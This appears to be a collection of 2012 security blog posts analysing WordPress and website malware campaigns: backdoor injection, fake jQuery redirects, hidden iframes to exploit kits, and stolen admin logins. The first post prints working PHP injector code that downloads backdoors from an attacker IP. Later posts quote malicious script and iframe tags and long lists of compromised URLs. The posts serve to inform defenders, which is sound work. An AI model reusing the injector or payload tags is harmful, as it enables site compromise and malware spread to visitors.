Author: Daniel Cid

A backdoor injector code we found on a compromised site:

if(is__writable($dir."/wp-includes/")):
        file_put_contentz($dir.'/wp-includes/page.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-includes/page.php', $time);
        die(";;/wp-includes/page.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/".get_settings('template')."/")){
        file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time);
        die(";;/wp-content/themes/".get_settings('template')."/timthumb.php;;true_upload");
}

if(is__writable($dir."/wp-admin/")):
        file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-admin/options-plugin.php', $time);
        die(";;/wp-admin/options-plugin.php;;true_upload");
endif;

if(is__writable($dir."/")):
        file_put_contentz($dir.'/wp-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-plugin.php', $time);
        die(";;/wp-plugin.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/")){
        file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-content/themes/theme.php', $time);
        die(";;/wp-content/themes/theme.php;;true_upload");
}

if(is__writable($dir."/wp-content/uploads/")){
        file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/uploads/timthumb.php', $time);
        die(";;/wp-content/uploads/timthumb.php;;true_upload");
}else{
        die(";;0;;false_upload");

It looks for a writable directly either inside wp-includes, wp-content or inside uploads to inject a backdoor.

Lots of compromised sites redirecting to TDS:

http://1151.website.snafu.de/hkkj.html?h=1475928
http://adaptpro.co.uk/mwhi.html?h=1380448
http://aennekens.de/hozs.html?h=1180315
http://afamontserrat.org/zapn.html?h=877095
http://afhwarranty.us/wmcs.html?h=1235327
http://aklmn.com/mzos.html?h=1216229
http://alghuraba.co.uk/owes.html?h=1364764
http://app.2need.net/hwed.html?h=617164
http://appprices.com/heos.html?h=1168480
http://arlington9to5.com/mccf.html?h=423540
http://ashneh.in/zopn.html?h=841597
http://babylonproduction.com/wmcf.html?h=557620
http://badmintonscreensaver.com/ehai.html?h=1333181
http://bcitec.com/amms.html?h=1232317
http://belve.fr/wzai.html?h=1244948
http://belve.fr/wzpn.html?h=847683
http://bestofbec.com/hkgb.html?h=1507945
http://bestofbec.com/hmgn.html?h=809281
http://biggtimeinc.com/hfis.html
http://bizwonk.com/zcei.html?h=1044231
http://blackfriday-shopping.com/mhhi.html?h=1366273
http://blackpooldesign.de/akkl.html?h=1476799
http://blamebilly.com/zhgu.html?h=992578
http://blamebilly.com/zhzs.html?h=1033872
http://blog.fantasygifts.com/ozaf.html?h=425793
http://bocaraton.isabellascott.com/hmmd.html?h=710618
http://bonadies.com.br/hezd.html?h=1449509
http://bornreadydesign.co.uk/eopu.html?h=1415104
http://buseklaw.com/mhai.html?h=1370845
http://busymomsfitness.org/mjpx.html?h=1507937
http://cdfusa.org/ahpn.html?h=846779
http://celeirodoalgarvio.com/azgn.html?h=856613
http://cib.onthewebhosting.eu/zwed.html?h=489754
http://cifraconsumibles.com/oczs.html?h=1149354
http://cinemamasti.com/edgv.html?h=960530
http://codeweb.cz/wmcf.html?h=719087
http://comfortconnectac.com/zwcd.html?h=965408
http://coverskin.ir/odpl.html?h=962581
http://crosbystreetgallery.com/emos.html?h=1244945
http://csplague.gen.tr/cwzi.html?h=1323098
http://dandbuniforms.com/hecd.html?h=595670
http://dandbuniforms.com/hegu.html?h=854117
http://darwinawards.fr/wami.html?h=1177610
http://dc5intent.com/wcoi.html?h=1163659
http://acme-parts.com/adbr.htm?h=968600
http://acme-parts.com/mdxr.htm?h=983583
http://africanmangoextract4u.com/maes.htm?h=1054006
http://agsolution.com/maes.htm?h=1054006
http://allroemenie.com/chci.htm?h=1154884
http://allroemenie.com/ocgu.htm?h=800432
http://asadbashir.com/aepn.htm?h=841168
http://asadbashir.com/hazi.htm?h=1110359
http://ashleeoakscommunity.com/maes.htm?h=1054006
http://ashleeoakscommunity.com/meci.htm?h=1097292
http://billsarena.com/adbr.htm?h=968600
http://blockoss.com/ocgu.htm?h=800432
http://crossmotion.com/maes.htm?h=1054006
http://crossmotion.com/meci.htm?h=1097292
http://decopersan.com/ccpu.htm?h=1414990
http://eewsonline.com/ccpu.htm?h=1414990
http://eewsonline.com/mhpu.htm?h=1415203
http://hazirlikkitap.com/maes.htm?h=1054006
http://iconmasonry.com/aeoi.htm?h=1118301
http://iconmasonry.com/hagn.htm?h=1397981
http://iconmasonry.com/maes.htm?h=1139554
http://pinnaclecoin.com/ocgu.htm?h=800432
http://termlifepolicys.com/occs.htm?h=1052123
http://tutsaksesli.com/meci.htm?h=1097292
http://vintagebelts.com/aeoi.htm?h=1033082
http://vintagebelts.com/megn.htm?h=836122
http://widetrader.com/aepn.htm?h=841168
http://widetrader.com/hazi.htm?h=1110359
http://widetrader.com/maes.htm?h=1054006
http://widetrader.com/wopu.htm?h=1410598
http://wilddogtraining.com/hazi.htm?h=1056691
http://wildearthfineart.com/eack.htm?h=749606

And that’s just a small sample. We have detected just in February over 500 sites compromised exactly like that.

We keep seeing fake jQuery sites popping up and being used to distributemalware. One was jquerys.org, other was jquery-framework.com and the new oneis jqueryc.com (199.59.241.179).

And this new one seems to be affecting many web sites in the last few days. All of them have the following on their header or index.php files:

window.top.location.href = "httx://www.jqueryc.com"

Which redirects any visitor to the web site to jqueryc.com where it is then sent to other random spammy domains (seems like a TDS is in place).

Update:We are also seeing some sites with this javascript file being included: http://www.jqueryc.com/jquery-1.6.3.min.js, which just redirects back to jqueryc.com via the same window.top.location.href in javascript.

*Note that the domain was just registered (20-nov-2012), so it is not being flagged anywhere.

**The official jquery sites are jquery.org or jquery.com. Other variations are likely fake.

It seems that the .co.cc (sub TLD) that used to be mass used byspammers and malware is now gone.Their registration page is offline:

$ host co.cc
Host co.cc not found: 3(NXDOMAIN)

$ host www.co.cc
Host www.co.cc not found: 3(NXDOMAIN)

And we hope it stays that way.

If your site is loading hidden iframes from *.ftp1.biz/pony, look for a curlor file_get_contents call to http://wordpresstest2.info/1.txt.When you visit this site, it generates random iframes:

http://lsghmr.ftp1.biz/pony ( 206.212.240.20)
http://rchscbul.ftp1.biz/pony ( 206.212.240.20)
http://idzui.ftp1.biz/pony
http://vtfptnmxk.ftp1.biz/pony

That are displayed on the compromised sites.

Update 2012/Oct/12: Their site was fixed and is not loading malware anymore.

If you are using any widget/code from http://badgeplz.com/, remove it asapfrom your site. It has been compromised and is serving malicious code. So ifyou have any widget from there, it will be loaded from your site as well (blackhole exploit kit).

Example:

$ curl -D - http://badgeplz.com/instagram/?u=user
<script>v="va"+"l";try{ebgserb++;}catc h(snregrx){try{(Math+"")()}catch(ztbet) {m= ..

Note only that, but their main site is compromised as well.

A New batch of compromised sites are being infected with hidden iframes leading to the Redkit exploit kit. A site gets hacked and an iframe similar to this one is added::

<iframe src="http://ad-d-to.com.br.ms:81/rem2.html..

Once that is loaded into the browser, it redirects anyone visiting the site to:

http://orcasp.com.br/43745180.html

Where it tries to make the browser load some malicious PDFs or Jar files:

<applet archive="http://orcasp.com.br/33256.jar"..

<iframe src="http://orcasp.com.br/98765.pdf"..

And if you are running an outdated version of Java or Adobe PDF, your personal computer would get compromised as well.

Seeing many sites with a fake jquery links on them from jquery-framework.com (justregistered on 2012/08/05)::

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

If you use jquery, make sure to link to reliable sources (either jquery.org or googleapis). This one is redirecting usersto http://browser-31.com/s/3013.

We are seeing a new batch of the rebots.php infections on WordPress and one thingis intriguing us. On many sites we are analysing, WordPress is updated and no suspiciousbackdoors or plugins were found. All in order, except for the javascript injected inside the theme.

The only thing in common on them is a single login to wp-admin, followed by a visit towp-admin/theme-editor.php to modify the theme:

184.22.164.xx - - [29/Aug/2012:21:03:02 -0300] "POST ///wp-login.php HTTP/1.1" 302 - "-" ""

184.22.164.xx - - [29/Aug/2012:21:03:13 -0300] "POST //wp-admin/theme-editor.php HTTP/1.1" 302 -
"-" ""

184.22.164.xx - - [22/Aug/2012:21:03:16 -0300] "GET //wp-admin//theme-editor.php?file=index.php&theme=classic&scrollto=0&updated=true HTTP/1.1" 200 58188 "-" ""

So it seems someone was able to steal the wp-admin password and edit the theme. It was done automatically, since no CSS or .JS files were loaded.

Another intereting issue is that on some of these sites, we didn\’t identify any brute force attack trying to guess the passwords. Just this single login.

Since we don\’t know how these passwords got stolen, we recommend people to change their wp-admin passwords asap until we have more info (specially if you have been compromised with the rebots.php injection).

Dennis (from unmask) posted about some iframe injections that he has beenseeing lately: RFI: Server-wide iframe injections.

The post is interesting, so read that first. We are also seeing many variationsof this attack, always with the iframes being injected as domain.com/[randomnumbers].html and redirecting the user to Fake AV. This are some of the URLs we are seeing:

     15 http://tiergefluester.ch/37624443.html
      8 http://qmg2.com/96344443.html
      6 http://52943578.nl.strato-hosting.eu/49404443.html
      5 http://nw-transporte.de/31374443.html
      4 http://soka.saitama-eastern.jp/68844443.html
      3 http://tvhr9.com/59304443.html
      3 http://tvhr9.com/48204443.html
      3 http://tijerasycosmetica.es/32154443.html
      3 http://sepatch.org/74734443.html
      3 http://qmg2.com/51204443.html
      3 http://photopassion34.eu/84364443.html
      2 http://sipsnstrokesstudios.com/90144443.html
      2 http://relance-clients.com/18304443.html
      2 http://langaz.pl/28074443.html
      2 http://kopian.net.pl/10344443.html
      2 http://huskiesfootball.ca/54924443.html
      2 http://humourr.com/77204443.html
      2 http://fam-vandenberg.nl/33604443.html
      2 http://dev.look-whos-talking.co.uk/75584443.html
      2 http://cadeauxentreprise.ca/40104443.html
      1 http://www.sportman.nl/44554443.html
      1 http://vanaden.nl/76644443.html
      1 http://tvhr9.com/92824443.html
      1 http://tvhr9.com/15374443.html
      1 http://tijerasycosmetica.es/68134443.html
      1 http://tiergefluester.ch/71834443.html
      1 http://tiergefluester.ch/47254443.html
      1 http://thomasvillefurnishings.ca/66124443.html
      1 http://soka.saitama-eastern.jp/76924443.html
      1 http://soka.saitama-eastern.jp/31164443.html
      1 http://sipsnstrokesstudios.com/82464443.html
      1 http://shopmassive.com/72534443.html
      1 http://shopmassive.com/60754443.html
      1 http://shopmassive.com/50284443.html
      1 http://sepatch.org/58814443.html
      1 http://sepatch.org/35224443.html
      1 http://sepatch.org/14244443.html
      1 http://santeayurveda.com/48804443.html
      1 http://sacem.com.tr/95534443.html
      1 http://s1050444.iie.nl/76384443.html
      1 http://roswitha-jacobi.de/67874443.html
      1 http://roswitha-jacobi.de/52194443.html
      1 http://roswitha-jacobi.de/22914443.html
      1 http://roswitha-jacobi.de/15584443.html
      1 http://reisendefamilie.net/70004443.html
      1 http://rectol.com/76084443.html
      1 http://rectol.com/11154443.html
      1 http://radiocanvas.co.uk/97984443.html
      1 http://qmg2.com/82474443.html
      1 http://qmg2.com/76574443.html
      1 http://qmg2.com/74054443.html
      1 http://qmg2.com/34794443.html
      1 http://qmg2.com/20054443.html
      1 http://qmg2.com/14934443.html
      1 http://pohlgruppe.de/89314443.html
      1 http://pohlgruppe.de/73684443.html
      1 http://photopassion34.eu/93154443.html
      1 http://photopassion34.eu/35484443.html
      1 http://ozturannakliyat.com/94564443.html
      1 http://opracowaniagraficzne.pl/10474443.html
      1 http://nw-transporte.de/96284443.html
      1 http://mukogawa.jp/98984443.html
      1 http://moodle.fortpointdesign.com/31844443.html
      1 http://missweekderbesten.nl/12714443.html
      1 http://lojastelefrio.com.br/18854443.html
      1 http://linkeddoc.com/31974443.html
      1 http://langaz.pl/16524443.html
      1 http://kulycap.fr/63464443.html
      1 http://kopian.net.pl/69004443.html
      .. many many more ...

Note that all (or most) of these sites are compromised and being used by the attackers to spread malware botnet style. Dennis also questioned how are these sites being hacked.

Initially, all of them were running Plesk (at least I could access it as site.com:8443). However, as the infection is growing, I am seeing many sites not using Plesk with this type of malware, so we can\’t know for sure. We assume it is a mix of attacks (brute force FTP + outdated Plesk + anything they can find).